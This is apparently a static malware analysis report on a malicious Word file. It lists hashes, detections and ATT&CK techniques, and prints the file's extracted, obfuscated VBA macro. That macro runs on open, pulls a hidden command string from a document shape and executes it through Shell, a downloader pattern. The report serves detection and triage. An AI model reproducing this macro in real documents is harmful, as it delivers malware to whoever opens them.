Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66055ec57096d487…

MALICIOUS

Office (OLE)

Size: 144.6 KB
Created: 2018-12-11 11:28:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: e8cb64f17f65e93fede0c1d40c344d4a
SHA-1: 0840d1b2f41ddb4e1fcc95ad9ba99df9ef8320af
SHA-256: 66055ec57096d4875bca296136902ad9f06b2affc050ba64e2358f6308178425
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains a legacy WordBasic auto-exec macro (autoopen) that triggers a critical VBA Shell() call. That call invokes cmd.exe with execution flags, indicating an attempt to download and execute a second-stage payload. The obfuscated command line suggests downloader functionality.

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-6780294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6780294-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
    .Shell(XZBqET, lIRVsT), Vcpozp)
       sEcQzmzZwcmSCfN = (248683754 + Round(LfCtBODiPlzwEBOpJ) * 13206318 - RQArNQGtiNcHYUDAoXNrq + (hiBAdrbXdsddTALopcv / Tan(UVmdbbABaRwKutiSqM)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    EhWwFkSDK
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5429 bytes
SHA-256: 0e515f2af1343cb5843f3a08613b34a3c24863a86a31875748708d7fd6aa6b32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
161 of 193 identifiers look randomly generated (e.g. 'sKrzhDzisatEspOsqowFQzsK') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tLjKSjrzwMCj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
EhWwFkSDK
End Sub

Attribute VB_Name = "ABSjSLjuiiD"
Function EhWwFkSDK()
On Error Resume Next
   sqtkiCLKWNMtldTIW = (261167220 + Round(mZukdkpsRunaSSWj) * 55488997 - sKrzhDzisatEspOsqowFQzsK + (QimtbOzLJicUpsqlwrOzMBw / Tan(abihCisShCRUMlRM)))
tjKlXBwHUSHdKiPkaSzjQIbl = 70969572
   paLAWQSZlnuIWXhJOzTLQpm = (63336902 + Round(MOEEolCskqKzYE) * 124432982 - wzILYEjiohzwOizoBzJCNUzB + (QlhWLpvAOTpdziIfWQGmGiF / Tan(VvbuQjbCHTISCLcrEvzLKLD)))
BWrEqPlmfqBQOAjfr = 255658383
   afkWDVdSdwsnfQLRoIdG = (36327502 + Round(iXaJqzUwIkhKHdLH) * 36906287 - zPTdOqzXtEiHqjYQ + (MvtiizjpHFVJiFhDQIpqFIkK / Tan(GQSBuwlqjzLMhTSnnH)))
dNKwwEabjaqDLjKYjOoNH = 239357612
   LiVfTFRfwociJpQj = (63327051 + Round(YwwaqOOfdsnHGORtGwIsNOjW) * 311832708 - DKTajOaQmXQkoHQo + (ZrphORQjTXRmJMafjLE / Tan(CIZjqbtcVHBbZnJi)))
cpsCrPqJicKqFHv = 80636102
   RFHvfDZASPXjljnpAz = (82026665 + Round(ZQJKibTTsuhpOBttb) * 285014021 - wjPiwUcLEPdOjqEvBvwMD + (FHYhiVkmtOJMQiKlLqFQP / Tan(OfAwJGswiihMbH)))
QmHbRWOEUaVlPkG = 42067056
   pWOjjoDIwWSsRAKYHQh = (88403715 + Round(kLhnSMACqZHWBqB) * 165268538 - tZUQvVIWvhsXqHtQTEKhvQ + (CFIwKWPJIzUXItpppYR / Tan(iIfzSOFhmrrqcwRLmZ)))
zjYjXVjlXdOUIitzuaIiwRiX = 115867905
   lizKbJVRMhALHkKHOBB = (131328283 + Round(YvWjzwLiwIcjoqDdwKAUHs) * 172808105 - bNpSnkBPjpNibdcMKnPYXi + (uHiRrBzffVhElGsqL / Tan(MAwdUBShnKTdBRw)))
vKJTKOhKiMtYqFSwDQKiTQn = 186843198
Const lIRVsT = 0
   UkMVtGdjNzpiAbwhZVj = (222851948 + Round(jJONCwwDLudtiWvK) * 164242524 - kQhqnASXpwPhjqSLkbwHrHic + (CMoSFDXAXvRfsW / Tan(viJCndNmbXlTMRGc)))
EokodFjsshJuAfsFkMMzc = 268377615
   tckhmEaWiiXoWLnrK = (7670103 + Round(KCNzMQFmEuQLGHrWo) * 69528091 - iGplzTVnwtBcAsXNPfiYR + (RVcRTQhfowjcWJUQOird / Tan(sDRQSitbqKmQwoU)))
hAEFTFDvYWOtzRzh = 262639789
   slWuQnmRoJENnbYcpkzFzHz = (192703200 + Round(EWikUjzaGjnoKLkck) * 74926289 - vJiokmMbwnvlltfLRH + (TdHmjskoiYPcNwciFaiuw / Tan(EwmKzCuiASVDrtn)))
zvAzhDiLipILZljMjL = 160266069
   LLEtZVZjtGGrmuDmE = (77192338 + Round(BwjIBSwAizTAWsZdN) * 289665187 - miIdJkPbsAPwZod + (TiDCbaVqjZFjwNRpuw / Tan(jtUXYlrGzTCtLtWFwKp)))
MMRujijcfjZCbPtcwHiR = 237122864
Set WvhuAYzHJ = tLjKSjrzwMCj.Shapes(OiIUj + "UUCYusK" + dWbASDh)
   tmVXFjMLziIKpmtAPAqO = (132549628 + Round(jEcHDdPjNSYwDFBGSTKIUjw) * 179719313 - zBwUwqwJBGQuzf + (vSRpmqinzJhXELXwHBFEc / Tan(MPcZoBzkLVnbNBSHp)))
QNwKQTuwiJJtsaGi = 35438124
   otjbfrPWtHdnAScdvUHCTHw = (10254221 + Round(MFDXCIsEEbjHzrHrVlQCwDE) * 109632978 - czzBXjwijSmLwq + (kivqsWvdALzWjzvJBmVaLuDh / Tan(mZSZVfXuRRQHNXfhTzqZJQjk)))
kZdQoqfOuGwcDff = 175600657
   jzlFuIVzHobiBJFUodJ = (262446022 + Round(HFjiSmKjbKcXlShPvKzbMfjV) * 93029600 - zCQSRdGdZtFXcWKQf + (wHPrYEsSLMibVKUBpHQJ / Tan(zQItnKYibQvAFXGAGiMZzRu)))
zYvCahDAVlwqHwktUjkvmbQ = 253325449
   LDDEhLJwoijWHPYMHjlFoio = (305370926 + Round(MpOJSkfbcXtNovzZbvi) * 136651499 - LlkTBwLfDcOIfUWv + (WtDvirfwSnojMnFZMBEipQ / Tan(UvZuiEJaadmZoRRhtEUjKX)))
qpIjSTRRzFHjAEzBtIMNDaNR = 56571788
XZBqET = WvhuAYzHJ.TextFrame.TextRange + PVIuNv + cDjthWO + YQtHtS + jwHWHI + CVizbqir + zawlsR + NwHbjlii + GZHGfi + GnqPPZLv + wsbHwzF + dOYTstw + WrLHNQ + VFzHW
   coOfjuAfkOqoMrGVFXQXzUD = (298129093 + Round(tmapbIwtloBhlvot) * 31947602 - obrSdXEzBoBwHkVSnHZpJGu + (aCFnTbbiscPRVaJDkiGIsojQ / Tan(THhTOihhwraRQdaM)))
DfVDwMzVEiAmDlWobz = 129164086
   YKNTrzpfdjIiWZdKKQHq = (332912944 + Round(VNZZNEMEhjXBiHwGt) * 264600633 - sAhbFIuMWqEmbiHozuSm + (TZwZHUrWMEXSNFRomTQSr / Tan(OcwvXaTwLbCrZajBwnDqKl)))
TNYpANbBTuiKVcLzQCOsw = 110938766
   sCjJPDoIVsqATDHYsJTV = (39638476 + Round(nTwzcmSZzjmHOwVOdq) * 135301054 - TOGhSJznhvHJXYPQ + (RaCpvtGOMoIDdjcA / Tan(AYMRiSoisDbckqjEDLQSXXV)))
TGVpkDPiIiYrDunHNKDqflcw = 163171824
   QWjjzRzEiIIXsQtajHMui = (307434409 + Round(WDKMHwqwGdlQIqjpKwOvAnQz) * 211725139 - jiJAHEWYKdmFqFnLBu + (zlkASBzQzwjmNjl / Tan(MnFVhujfFDFGIHolV)))
jlwirzJoWcbqZYEqbYvZZEB = 32043872
   OwuuBilvMoTiGVu = (39953346 + Round(OaCqlNRwrBGSiSRCiau) * 104129387 - fiwctzczLslWtmf + (RcldwJhiciVCcYuAq / Tan(jvFOsOozjJVwkjmlQz)))
mJWzSzKdZWmzljY = 17344642
   cNpmXoDlZUjMaQlKNPujEGw = (133178408 + Round(ivUwEzOKoowoPEYJAY) * 286719469 - NiCbiwPkRpVPVPss + (oUXUBlbnVzLVZEiHKJwss / Tan(HhitwSjTALjaLDUpM)))
aoIzEOrlnHKFwzqWNppHnJEB = 325914513
   WiZkarLjmcMhiJZ = (285115271 + Round(lXGfBfDvhnYIsHE) * 124955353 - PURHYDSWmahRzQamrtMWc + (CWotEmatVIOzuEZzMU / Tan(JPEVihWwWBNswIuSvSfwfv)))
FZDCVVMrhriTFwAKMhoDrIQ = 123229939
   sibPEALSjZOFTUUC = (255998336 + Round(SfucwjfpiFUqXmjfzTVtfMK) * 102138091 - klPFlOwRtOCQQjujPRFztCbW + (VBjtLFUfiNvQjwqYYiXhOj / Tan(aKQuEREiJtRQNQYiJhlmV)))
TfVPZVYEoZmRFiuKQNZfmWSj = 190158521
vOzczPbqk = Array(orjKEEs, wKpnwRY, pNwNom, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(XZBqET, lIRVsT), Vcpozp)
   sEcQzmzZwcmSCfN = (248683754 + Round(LfCtBODiPlzwEBOpJ) * 13206318 - RQArNQGtiNcHYUDAoXNrq + (hiBAdrbXdsddTALopcv / Tan(UVmdbbABaRwKutiSqM)))
OSLkkduACpAikvVDMvXZBq = 170621595
   XsasOWcjDKlvVfpDIJuMOoV = (9279160 + Round(OYdQAFuvivuLfirw) * 29670323 - AooaWQrGKzOiiXZ + (zwwSDFqArjvsciCQJjVN / Tan(nBNZtuvhzNWmBitzlEu)))
ojmVzifwzUBCLFLwltJLvSrW = 160925081
End Function